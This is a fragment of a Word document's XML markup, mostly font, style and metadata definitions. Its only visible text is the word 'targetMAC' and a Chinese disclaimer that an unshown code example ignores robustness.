          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>targetMAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4AB9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                  }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AA4AB9" w:rsidRPr="00AA4AB9" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4AB9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7E0BD5" w:rsidRDefault="00AA4AB9" w:rsidP="00AA4AB9">
      <w:r w:rsidRPr="00AA4AB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注意：这个例子只是为了说明问题，并没有考虑到程序的健壮性，所以并不一定能在任何一台机器任何一个系统上运行。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007E0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13"/>
    <w:rsid w:val="007E0BD5"/>
    <w:rsid w:val="00AA4AB9"/>
    <w:rsid w:val="00C3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4AB9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA4AB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4AB9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA4A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0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48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4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39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7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1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7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5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08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9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0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38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5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87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65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50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41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77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1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0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7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26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4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7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5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3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6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1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8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8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6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5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0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5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7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1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1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4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3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9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9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0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8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1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4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8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0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2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6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5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9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1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5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5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2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4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9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2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3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8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4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0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0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45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8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6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8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7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5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7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6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5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3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5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2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9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6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4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3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2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0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9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8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1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9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9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9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0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9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9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6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8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44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6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8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6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3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7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3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0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2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4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1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0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0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0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1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5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6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3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6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3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7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X250</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>X250</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-30T10:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-30T10:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>